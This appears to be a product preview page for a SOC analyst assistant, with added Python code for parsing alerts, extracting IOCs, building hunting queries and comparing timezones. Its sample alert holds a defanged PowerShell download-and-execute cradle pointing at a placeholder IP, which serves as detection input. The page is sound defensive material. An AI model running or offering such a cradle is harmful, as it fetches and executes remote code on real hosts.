CYBERSHARK ATCOR Preview


ATCOR analyst workflow preview

ATCOR / ATTCOR-CR is a SOC analyst assistant designed to reduce repetitive alert handling and turn raw investigation context into clearer customer updates, stronger hunting pivots, and consistent analyst output.

$ atcor --intake suspicious-powershell

[ioc] host=HOST-01 user=jsmith process=powershell.exe

[triage] ATT&CK context loaded for analyst review

[output] writeup.md queries.md case-note.txt ready

WHAT IT DOES

From alert intake to customer-ready output

The tool supports analysts through the high-friction parts of repeat alert handling: extracting indicators, shaping the investigation narrative, generating query packs, checking evidence quality, and exporting copy-ready outputs for tickets, portals, or email.

01

Intake

Paste raw alert context and normalize the useful case facts.

02

Enrich

Review extracted IOCs, ATT&CK/STIX context, and triage hints.

03

Hunt

Generate query packs for tools like Sentinel, Splunk, Elastic, Defender XDR, CrowdStrike, and more.

04

Handoff

Export customer-ready writeups, case notes, and query bundles in analyst-friendly formats.
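The four steps above, as an added example that is not ATTCOR-CR's own code: it takes a constructed alert through intake (normalising "Key: value" case facts), enrichment (refanging and extracting IPv4, SHA-256 and URL indicators), evidence-quality checks, and a per-platform query pack. The alert text, the RFC 5737 test IP, the placeholder hash, the business field names and the Splunk CIM field names are all assumptions. It also shows a check the workflow needs and the page does not spell out: alert fields are attacker-influenced, so every value interpolated into a hunting query is quoted for that query language rather than pasted in raw.

```python
import re

# Constructed sample alert (not a real detection). Host, user and file names are placeholders,
# the IP is from the RFC 5737 TEST-NET-3 range and the hash is the SHA-256 of empty input.
RAW_ALERT = """\
Title: Suspicious PowerShell execution detected on HOST-01
Timestamp: 2026-04-07T21:04:32Z
Host: HOST-01
User: jsmith
Process: powershell.exe
CommandLine: powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://203.0.113[.]45/stage.ps1')"
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256 = re.compile(r"\b[0-9a-fA-F]{64}\b")
URL = re.compile(r"https?://[^\s'\"<>)]+")

def parse_alert(raw: str) -> dict:
    """Step 1, intake: normalise 'Key: value' lines into lower-cased case facts."""
    facts = {}
    for line in raw.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip():
            facts[key.strip().lower()] = value.strip()
    return facts

def refang(text: str) -> str:
    """Undo common defanging so indicators match the form seen in telemetry."""
    text = text.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"hxxp", "http", text, flags=re.IGNORECASE)

def extract_iocs(facts: dict) -> dict:
    """Step 2, enrich: pull IPv4 addresses, SHA-256 hashes and URLs out of every field."""
    text = refang("\n".join(facts.values()))
    ips = {ip for ip in IPV4.findall(text) if all(int(o) <= 255 for o in ip.split("."))}
    return {
        "ipv4": sorted(ips),
        "sha256": sorted({h.lower() for h in SHA256.findall(text)}),
        "url": sorted(set(URL.findall(text))),
    }

def evidence_quality(facts: dict, iocs: dict) -> dict:
    """Checklist behind the Evidence Quality panel; False marks an item still pending."""
    return {
        "timestamp present": bool(facts.get("timestamp")),
        "host and user context captured": bool(facts.get("host") and facts.get("user")),
        "command line captured": bool(facts.get("commandline")),
        "hash available": bool(iocs["sha256"]),
        "network indicator available": bool(iocs["ipv4"] or iocs["url"]),
    }

def quote(value: str) -> str:
    """Double-quoted literal for KQL and SPL with backslash and quote escaped.
    Without this a crafted command line or hostname in the alert could break out
    of the string and rewrite the analyst's hunting query."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'

def hunt_queries(facts: dict, iocs: dict) -> dict:
    """Step 3, hunt: one query per platform, pivoting from the alerting host to the IOCs."""
    host = quote(facts["host"])
    terms = iocs["ipv4"] + iocs["url"]
    kql = ["DeviceProcessEvents", f"| where DeviceName =~ {host}",
           '| where FileName =~ "powershell.exe" or ProcessCommandLine has "powershell"']
    # Splunk CIM Endpoint.Processes field names (dest, process_name, process) are assumed.
    spl = [f"index=endpoint dest={host} process_name={quote(facts['process'])}"]
    if terms:  # has_any() with an empty list is a syntax error, so emit the pivot only when present
        kql.append("| where ProcessCommandLine has_any (" + ", ".join(quote(t) for t in terms) + ")")
        spl.append("| search " + " OR ".join("process=" + quote(f"*{t}*") for t in terms))
    queries = {
        "Defender XDR / Sentinel (KQL)": "\n".join(kql),
        "Splunk (SPL, CIM field names assumed)": "\n".join(spl),
    }
    if iocs["sha256"]:  # fleet pivot: did the same binary run on any other host?
        queries["Fleet pivot (KQL)"] = "\n".join([
            "DeviceProcessEvents",
            "| where SHA256 in (" + ", ".join(quote(h) for h in iocs["sha256"]) + ")",
            f"| where DeviceName !~ {host}",
            "| summarize count() by DeviceName, AccountName, ProcessCommandLine",
        ])
    return queries

def run(raw: str = RAW_ALERT) -> dict:
    """Intake -> enrich -> hunt; step 4 (handoff) would render these dicts into the writeup."""
    facts = parse_alert(raw)
    iocs = extract_iocs(facts)
    return {"facts": facts, "iocs": iocs,
            "quality": evidence_quality(facts, iocs), "queries": hunt_queries(facts, iocs)}

if __name__ == "__main__":
    result = run()
    for check, ok in result["quality"].items():
        print(f"[{'ok' if ok else 'pending'}] {check}")
    for name, query in result["queries"].items():
        print(f"\n--- {name}\n{query}")
```

The `quote()` helper is the part to keep even if the rest is replaced by a real engine: a command line such as the one in the sample contains double quotes, and concatenating it into KQL or SPL unescaped produces a broken or, worse, subtly different query. The `has` operator in the example matches whole terms, so "powershell" still matches "powershell.exe" but not a renamed copy of the binary; the hash pivot is there to catch that case.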

REAL APP LOOK

ATTCOR-CR - SOC Assistant

Analyst-ready writeups, full ATT&CK/STIX lookups, platform hunting queries, and remediation guidance.


UTC clock / time zone comparison

Use this to compare the alert's UTC timestamp with the local time in the user's or host's time zone; the offset matters when judging whether activity happened outside working hours.

Current time

UTC: 2026-04-07 21:04:32

Europe/London: 2026-04-07 22:04:32 BST
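The comparison the clock panel makes, as an added example rather than ATTCOR-CR's own code. It assumes the alert timestamp is ISO 8601 with an explicit offset (the trailing "Z" in the sample case), that the host's zone is known from asset inventory, and an 08:00 to 18:00 weekday working window; all three are assumptions. A timestamp with no offset is refused rather than silently treated as UTC, because that is the usual way an alert ends up an hour off in the customer writeup.

```python
from datetime import datetime, time, timezone
from zoneinfo import ZoneInfo, ZoneInfoNotFoundError

# Constructed alert time, matching the sample case on this page.
ALERT_TS = "2026-04-07T21:04:32Z"
# Assumed working window in the host's local time.
BUSINESS_HOURS = (time(8, 0), time(18, 0))

def parse_alert_time(ts: str) -> datetime:
    """Parse an ISO 8601 timestamp and refuse naive ones: without an offset the hour is ambiguous."""
    dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))  # 'Z' suffix support predates Python 3.11
    if dt.tzinfo is None or dt.utcoffset() is None:
        raise ValueError(f"alert timestamp {ts!r} carries no UTC offset; confirm which zone the source logs in")
    return dt

def zone_available(zone: str) -> bool:
    """True if the IANA zone can be loaded from the system or tzdata package."""
    try:
        ZoneInfo(zone)
        return True
    except ZoneInfoNotFoundError:
        return False

def local_view(ts: str, zone: str) -> dict:
    """UTC and local wall-clock views of the alert time plus an out-of-hours flag."""
    dt = parse_alert_time(ts)
    local = dt.astimezone(ZoneInfo(zone))
    in_window = BUSINESS_HOURS[0] <= local.time() < BUSINESS_HOURS[1]
    return {
        "utc": dt.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "local": local.strftime("%Y-%m-%d %H:%M:%S %Z"),
        "offset_hours": local.utcoffset().total_seconds() / 3600,
        "out_of_hours": local.weekday() >= 5 or not in_window,
    }

if __name__ == "__main__":
    for zone in ("Europe/London", "America/New_York", "Asia/Tokyo"):
        if zone_available(zone):
            print(zone, local_view(ALERT_TS, zone))
```

Using `zoneinfo` rather than a fixed offset is the point: the sample date falls inside British Summer Time, so Europe/London is UTC+1 on that day and UTC+0 three weeks earlier, and the out-of-hours judgement flips with it.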

1. Intake

Paste the alert, choose a case template if useful, and confirm the core fields before generating output.


2. Parse and enrich

CLICKABLE PREVIEW

Generate a SOC case preview

Choose a scenario and let the interactive preview populate the intake, triage, query, evidence, and customer writeup panels. This is a safe website preview of the workflow, not the full private ATTCOR-CR app engine.


WORKFLOW SCREENS

Relevant ATCOR workflow views

Alert Intake STEP 01
Suspicious PowerShell execution detected on HOST-01
Host: HOST-01
User: jsmith
Process: powershell.exe

Evidence Quality STEP 02
  • Timestamp present
  • Host and user context captured
  • Hash and reputation pending
  • Sandbox context recommended

Hunting Queries STEP 03 (shown in KQL for Defender XDR / Sentinel; the Splunk and Elastic variants are generated from the same case facts)
DeviceProcessEvents
| where DeviceName =~ "HOST-01"
| where ProcessCommandLine has "powershell"
Platform tabs: Sentinel, Splunk, Elastic, Defender XDR
Customer Writeup STEP 04

Hello,

We observed suspicious PowerShell execution and reviewed the available endpoint evidence.

Recommended next steps: validate user activity, review command-line context, and confirm whether the execution was expected.

Export formats: .docx, .md, .txt

ACCESS AND BUILD

Built for local analyst use

ATTCOR-CR is designed to run locally once installed, with configurable defaults for theme, timezone, selected platforms, and ATT&CK display preferences. It supports analyst judgement rather than replacing it: generated outputs should always be reviewed before being actioned.

Core capabilities

Customer-ready writeups, multi-platform hunting query bundles, ATT&CK-assisted triage, IOC extraction, remediation playbooks, evidence-quality scoring, and exports for handoff.

Open ATCOR repository